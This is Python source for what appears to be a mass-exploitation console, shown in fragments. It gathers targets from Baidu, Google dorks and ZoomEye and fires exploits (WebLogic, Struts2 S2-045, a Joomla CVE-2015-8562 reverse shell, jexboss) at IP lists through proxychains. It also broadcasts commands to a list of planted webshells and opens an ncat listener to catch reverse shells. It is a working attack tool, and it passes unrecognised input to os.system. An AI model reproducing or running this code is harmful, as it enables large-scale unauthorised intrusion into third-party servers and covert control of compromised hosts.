"\nmec" + colors.END + colors.CYAN + colors.BOLD + " > " + colors.END) try: execute(cmd) except (KeyboardInterrupt, EOFError, SystemExit): sys.exit(0) except KeyboardInterrupt: try: answ = input("\n[?] Are you sure to exit? [y/n] ") except KeyboardInterrupt: print("\n[-] Okay okay, exiting immediately...") check_kill_process('ss-proxy') sys.exit(0) if answ.lower() == 'y': check_kill_process('ss-proxy') sys.exit(0) else: continue if __name__ == "__main__": try: print(console.INTRO) main() except (EOFError, KeyboardInterrupt, SystemExit): console.print_error('[-] Exiting...') else: console.print_error( "[-] Seems like you\'ve encountered an unhandled exception") debug_except()
def scanner(scanner_args): ''' Execute exploit against given ip list ''' _, work_path, exec_path, custom_args, jobs = scanner_args[0], scanner_args[ 1], scanner_args[2], scanner_args[3], scanner_args[4] if SessionParameters.USE_PROXY: e_args = [ 'proxychains4', '-q', '-f', SessionParameters.PROXY_CONF, './' + exec_path ] else: e_args = ['./' + exec_path] e_args += custom_args e_args += ['-t'] target_list = open(SessionParameters.IP_LIST) os.chdir('./exploits/' + work_path) console.print_warning('\n[!] DEBUG: ' + str(e_args) + '\nWorking in ' + os.getcwd()) console.print_warning('\n[!] It might be messy, get ready!' + '\n') time.sleep(3) count = 0 tested = count rnd = 1 for line in target_list: target_ip = line.strip() progress = colors.BLUE + colors.BOLD + 'ROUND.' + \ str(rnd) + colors.END + ' ' + colors.CYAN + colors.BOLD + \ str(tested + 1) + colors.END + ' targets found\n' try: sys.stdout.write('\r' + progress) sys.stdout.flush() except KeyboardInterrupt: exit() count += 1 tested += 1 try: e_args += [target_ip] print(colors.CYAN + ' '.join(e_args) + colors.END + '\n') proc = subprocess.Popen(e_args) # continue to next target e_args.remove(target_ip) time.sleep(.1) if count == jobs or count == 0: count = 0 rnd += 1 _, _ = proc.communicate() if proc.returncode is not None: proc.kill() continue sys.stdout.flush() os.system('clear') except (EOFError, KeyboardInterrupt, SystemExit): sys.exit(1) else: console.print_error('[-] Error when running scanner') debug_except() os.system('clear') os.chdir(SessionParameters.INIT_DIR) console.print_success('\n[+] All done!\n') print(console.INTRO)
def execute(cmd): ''' handles user input in console ''' cmd = str(cmd).lower().strip() if cmd == '': pass elif cmd == 'info': print(colors.CYAN + '[*] Current directory: {}\ \n[*] Init directory: {}\ \n[*] Target: {}\ \n[*] Proxy config: {}'.format( os.getcwd(), SessionParameters.INIT_DIR, SessionParameters.IP_LIST, SessionParameters.PROXY_CONF)) elif cmd.startswith('target'): target = ''.join(cmd.split()[1:]) print(colors.BLUE + '[i] Target changed to {}'.format(target)) SessionParameters.IP_LIST = INIT_DIR + '/data/' + target elif cmd == 'init' or cmd == 'i': print(colors.CYAN + '[*] Going back to init_dir...' + colors.END) os.chdir(SessionParameters.INIT_DIR) elif cmd.startswith('baidu'): try: command = cmd.strip().split() dork = command[1] count = int(command[2]) os.chdir('output') print(colors.PURPLE + '[*] Searching on Baidu...' + colors.END) baidu.spider(dork, count) except (EOFError, KeyboardInterrupt, SystemExit): return else: console.print_error('[-] Error with baidu: ') debug_except() elif cmd == 'proxy': if not os.path.exists('data/ss.json'): console.print_error('[-] Please make sure \"data/ss.json\" exists') try: subprocess.Popen(['./tools/ss-proxy', '-c', './data/ss.json'], stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=False) except BaseException as err: console.print_error('[-] Error starting Shadowsocks proxy: ' + str(err)) debug_except() elif cmd.startswith('webshell'): try: command = cmd.split() if command[1] == '-b': try: ws.loadShells('webshell.list') cmd = input(colors.CYAN + 'CMD >> ' + colors.END) ws.broadcast(cmd) except BaseException as err: console.print_error( '[-] Error with webshell broadcasting: ' + str(err)) debug_except() else: pass except BaseException: if cmd == 'webshell': try: ws.loadShells('webshell.list') shell = input('[*] Select a shell: ').strip() ws.ctrl(shell) except BaseException as err: console.print_error('[-] Error with webshell: ' + str(err)) debug_except() elif cmd == 'redis': console.print_error('[-] Under development') elif cmd.startswith('google'): try: cmd = cmd.strip().split() dork = cmd[1] # well yes im a lazy guy subprocess.call([ './exploits/joomla/joomlaCVE-2015-8562.py', '--dork', dork, '--revshell=\'\'', '--port=4444' ]) except BaseException as err: console.print_error(str(err)) debug_except() elif cmd.startswith('jexboss'): jexboss(cmd, './exploits/jexboss/jexboss.py') elif cmd == 'q' or cmd == 'quit': check_kill_process('ss-proxy') sys.exit(0) elif cmd == 'h' or cmd == 'help' or cmd == '?': print(console.HELP_INFO) elif cmd == 'exploits': print(colors.CYAN + '[+] Available exploits: ' + colors.END) list_exp() elif cmd == 'z' or cmd == "zoomeye": try: os.chdir('./zoomeye') subprocess.call(['python3', 'zoomeye.py']) except (EOFError, KeyboardInterrupt, SystemExit): pass elif cmd == 'x' or cmd == 'clear': subprocess.call("clear") elif cmd == 'c' or cmd == 'reset': subprocess.call("reset") elif cmd == "attack" or cmd == "e": attack() else: try: print(colors.BLUE + colors.BOLD + "[*] Exec: " + colors.END + colors.GREEN + cmd + colors.END + '\n') os.system(cmd) except (EOFError, KeyboardInterrupt, SystemExit): pass
def attack(): ''' handles attack command ''' if input_check('[?] Do you wish to use proxychains? [y/n] ', choices=['y', 'n']) == 'y': SessionParameters.USE_PROXY = True else: SessionParameters.USE_PROXY = False answ = input_check('\n[?] Do you wish to use\ \n\n [a] built-in exploits\ \n [m] or launch your own manually?\ \n\n[=] Your choice: ', choices=['a', 'm']) if answ == 'a': print(colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' + colors.END + '\n') print(console.BUILT_IN) answ = input_check('[=] Your choice: ', check_type=int, choices=['0', '1', '2', '3', '4']) try: if answ == '2': console.print_error("\n[-] Under development") elif answ == '1': console.print_error('\n[-] Under development') elif answ == '0': scanner(ExecExp.weblogic()) elif answ == '3': scanner(ExecExp.s2_045()) elif answ == '4': scanner(ExecExp.witbe()) except BaseException: console.print_error("[-] We have an error executing exploit") debug_except() elif answ == 'm': print(colors.CYAN + colors.UNDERLINE + colors.BOLD + "\nWelcome, in here you can choose your own exploit\n" + colors.END) print(colors.CYAN + '[*] Here are available exploits:\n' + colors.END) list_exp() exploit = input( "\n[*] Enter the path (eg. joomla/rce.py) of your exploit: " ).strip() jobs = int( input_check("[?] How many processes each time? ", check_type=int)) custom_args = [] answ = input_check("[?] Do you need a reverse shell [y/n]? ", choices=['y', 'n']) if answ == 'y': lhost = input("[*] Where do you want me to send shells? ").strip() lport = input_check( "[*] and at what port? (make sure you have access to that port) ", check_type=int) custom_args = ['-l', lhost, '-p', lport] answ = input_check( '[*] Do you need me to start a listener? [y/n] ', choices=['y', 'n']) if answ == 'y': print("\n[*] Spawning ncat listener in new window...\n") try: subprocess.Popen(args=[ "gnome-terminal", "--command=ncat -nklvp " + lport + " -m 1000" ], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE) except BaseException: print( colors.YELLOW + "[-] Could not launch our listener, do you have GNOME-Terminal installed?" + colors.END + '\n') else: print( "[*] Okay, just make sure you receive the reverse shells\n" ) else: pass custom_args += input( "[*] args for this exploit (target IP is handled already) ").strip( ).split() exec_path = exploit.split('/')[1:] work_path = exploit.split('/')[:-1] delimtr = '/' exec_path = delimtr.join(exec_path) work_path = delimtr.join(work_path) delimtr = ' ' print( colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END, 'proxychains4 -q -f proxy.conf {} -t <target ip>'.format( exec_path), delimtr.join(custom_args)) scanner_args = (exploit, work_path, exec_path, custom_args, jobs) scanner(scanner_args) else: console.print_error('[-] Invalid input')